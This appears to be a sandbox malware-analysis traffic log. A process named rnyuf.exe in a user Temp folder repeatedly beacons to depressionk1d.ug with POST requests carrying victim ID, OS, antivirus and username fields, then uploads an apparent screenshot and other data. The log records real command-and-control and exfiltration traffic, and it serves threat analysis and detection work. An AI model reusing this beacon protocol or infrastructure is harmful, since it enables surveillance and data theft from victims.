                          Nov 12, 2021 22:23:27.781615973 CET3840OUTData Raw: af 69 17 b3 17 b1 9a dd 11 81 9a 90 51 b4 8a 50 33 45 ca 51 68 75 28 a4 c5 38 0a 9b 94 28 a7 52 01 4a 05 4b 2d 21 40 a7 81 4d 02 9e 2a 59 68 70 1c 57 15 f1 04 ff 00 c4 ba 3f fa ea 3f 91 ae d8 57 0f f1 04 ff 00 c4 bd 3f eb b0 fe 54 e9 ee 57 54 78
                          Data Ascii: iQP3EQhu(8(RJK-!@M*YhpW??W?TWTx-&)=y#]*t/<_{_)+4dG+u,C*}?Z1?T,g8G*eYo-5_3bMVF?og
                          Nov 12, 2021 22:23:27.781647921 CET3845OUTData Raw: 29 4c fc d9 c6 49 c9 eb f2 8a f7 b9 bf e1 22 f3 e4 f2 3f b2 fc 9d c7 66 ff 00 33 76 dc f1 9c 77 c5 79 3d cc ff 00 07 a7 27 cb d6 6e ed b3 ff 00 3c a2 9c e3 fe fa 8c d7 45 37 8d fe 16 cf 3c 93 4b a8 ee 92 46 2e c7 c8 ba 19 24 e4 ff 00 0d 71 62 64
                          Data Ascii: )LI"?f3vwy='n<E7<KF.$qbdt}GD)>yn7357_Mp|UC^;%yR&||*UiE5K`9^~i)4.u%H8 bp
                          Nov 12, 2021 22:23:27.781672955 CET3856OUTData Raw: 00 19 a7 03 49 40 14 08 75 38 0a 60 a7 0a 04 c7 52 8a 4e d4 53 24 75 14 50 28 10 b4 52 d1 8a 62 16 94 51 4a 28 25 8b 40 eb 45 39 7a d3 11 b3 e1 e1 fe 99 29 f4 8c ff 00 2a a0 7e f1 fa d6 87 87 87 fa 4c df f5 cc ff 00 23 59 e7 ab 7d 6b 9e 3f c5 90
                          Data Ascii: I@u8`RNS$uP(RbQJ(%@E9z)*~L#Y}k?ElsJ)ZZhTXK@RR!iE%(HCSQ&%tZ46IOy32~~"J^Wa!_G7i7:1Rg:C
                          Nov 12, 2021 22:23:27.781697035 CET3859OUTData Raw: d4 a1 a8 e6 1f 21 29 6a 4d d5 16 ea 03 52 e6 1f 29 30 6a 5c d4 21 a9 db a9 dc 5c a4 a0 d3 b3 50 86 a5 0d 4e e4 f2 92 83 4b 9a 8c 1a 5c d3 15 87 e6 8c d3 01 a5 cd 02 b0 ea 50 69 99 cd 00 d0 16 24 a3 34 cc d1 9c 77 a7 71 58 92 97 35 16 f1 47 99 e9
                          Data Ascii: !)jMR)0j\!\PNK\Pi$4wqX5G@rf5.R}oM-OQ4fr44nN&`xb>:jwccTFj\bjbyl7sPmc@-T "msx-8Ya>AHMsGNT
                          Nov 12, 2021 22:23:27.781708956 CET3865OUTData Raw: 0f 3c d6 f4 3f 88 8d 93 6d 4a ff 00 99 e2 d4 b4 bd a9 2b d2 32 14 51 45 18 a6 23 ac f8 65 ff 00 25 23 43 ff 00 af 8f fd 94 d7 d3 53 cf a9 4d ac cd 67 67 3d a4 31 c3 6f 14 a4 cd 6e d2 16 2e d2 0e ce b8 03 60 fc eb e6 5f 86 7f f2 51 f4 3f fa f8 ff
                          Data Ascii: <?mJ+2QE#e%#CSMgg=1on.`_Q?M}&]#:>5R-WvM%^N#OnncvgWn4]w/xD3;7d9f/C:k[nN#
                          Nov 12, 2021 22:23:28.285665035 CET3892INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:28 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          310192.168.2.450136178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:19.624877930 CET14560OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:19.647248983 CET14576INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:19 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:19.647293091 CET14576INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          311192.168.2.450137178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:19.783322096 CET14578OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:19.808468103 CET14578INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:19 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          312192.168.2.450138178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:19.950419903 CET14579OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:19.976623058 CET14579INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:19 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          313192.168.2.450139178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:20.113236904 CET14580OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:20.140470028 CET14580INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:20 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          314192.168.2.450140178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:20.286032915 CET14581OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:20.311932087 CET14581INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:20 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          315192.168.2.450141178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:20.451843977 CET14582OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:20.479233980 CET14582INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:20 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          316192.168.2.450142178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:20.608309984 CET14583OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:20.634598970 CET14583INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:20 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          317192.168.2.450143178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:20.766396046 CET14584OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:20.792874098 CET14584INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:20 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0
                          Nov 12, 2021 22:24:20.794776917 CET14585OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:20.794884920 CET14585OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:20.795104980 CET14595OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:20.795285940 CET14598OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:20.817917109 CET14603OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:20.817995071 CET14619OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:24:20.818023920 CET14624OUTData Raw: 1d c8 50 67 31 ec 90 15 65 23 95 c0 3f 74 0e 46 7d eb 95 8f 52 bf 8a dd ed e3 bd b9 48 5d 76 bc 6b 2b 05 61 e8 46 70 45 74 47 0d 2b dd b2 25 88 8d ac 91 56 92 8a 2b b4 e4 14 51 45 14 c0 2b e9 3f 83 cc bf f0 85 6d c8 dc 26 04 8f 63 1a 7f 81 af 9b
                          Data Ascii: Pg1e#?tF}RH]vk+aFpEtG+%V+QE+?m&c+oK>\Xr;+c*G:5)vRK[_f}+/5KHlb}(z9rZa{6>(Ucw5<OAK')uU+/ts`
                          Nov 12, 2021 22:24:20.840543985 CET14630OUTData Raw: 83 14 62 81 45 30 b8 53 85 36 94 1a 04 28 eb 4e 1d e9 b4 b4 d0 85 a2 8a 5a 64 8b 8a 4c 52 81 4a 06 29 d8 06 e2 8a 53 49 40 20 a2 92 8a 40 14 b4 52 1a 00 5a 51 40 a2 98 0b 4b 49 4a 29 88 5a 33 49 45 08 43 b3 40 eb 40 a3 35 40 3a 8a 6e 68 14 13 61
                          Data Ascii: bE0S6(NZdLRJ)SI@ @RZQ@KIJ)Z3IEC@@5@:nhaii(0RRZJZhLS@C:)BSiEQ,uQNuQ#<*1OH<RMU:uM~itj-f8dvjM3N8h<8isLlJ8Pi.h0Pib@iA
                          Nov 12, 2021 22:24:20.840595007 CET14651OUTData Raw: f2 17 b7 ff 00 7a 9f aa 1f f8 9a 5c 7f be 6a 3d 1b fe 42 f6 ff 00 ef 53 b5 13 9d 46 7f f7 cd 72 5b f7 ff 00 23 59 7f 07 e6 56 a4 ef 45 15 b9 ca 2d 14 94 b4 00 52 d2 52 f6 a0 40 29 69 29 69 08 29 45 25 28 a0 41 40 a2 81 48 07 03 4a 29 29 45 21 31
                          Data Ascii: z\j=BSFr[#YVE-RR@)i)i)E%(A@HJ))E!1)"Wm$*PvxEz^^<CW6_9z1z=x'KtVNkQ<i/Vk~B4WIqNQZVCZxsPNE&LsR@)i)"5Tp5
                          Nov 12, 2021 22:24:20.840621948 CET14661OUTData Raw: 2b c0 6b dd be 03 de 5a da 78 7f 56 fb 4d cc 30 ee ba 5d be 6c 81 73 84 e7 19 ac 2b fc 06 b4 7e 23 9f ff 00 84 73 5c ff 00 a0 2e a3 ff 00 80 af fe 14 a3 c3 ba ea b0 61 a3 ea 40 83 90 45 ab f1 fa 57 bb ff 00 6c 69 9f f4 12 b3 ff 00 c0 84 ff 00 1a
                          Data Ascii: +kZxVM0]ls+~#s\.a@EWliO/v_]U?Y'Wwe)IdePLmZ5EU?AK/O>2eT6u<KSjV:wwje;j@S%-4&wN5X%WxP2
                          Nov 12, 2021 22:24:20.841721058 CET14677OUTData Raw: 57 73 75 c2 c0 80 0f c0 00 2b af ff 00 84 73 43 ff 00 a0 36 9d ff 00 80 a9 fe 14 db fb 2b 4b 0f 0e 6a 51 59 da c3 6f 19 b6 95 8a 43 18 40 4e c3 ce 07 7e 05 2c 66 61 4e bd 37 08 c6 cc ac 1e 5f 52 85 55 39 4a e8 f8 e6 97 bd 18 a0 0a 8b 1a 85 2d 14
                          Data Ascii: Wsu+sC6+KjQYoC@N~,faN7_RU9J-%#B^=F6Wo1+oL<R},[[`Jr</_;5]\ic7sKPZxKK$ps+5{{sw+n|kL-c
                          Nov 12, 2021 22:24:20.888509035 CET14691INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:20 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          318192.168.2.450144178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:20.934299946 CET14692OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:20.961424112 CET14692INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:20 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
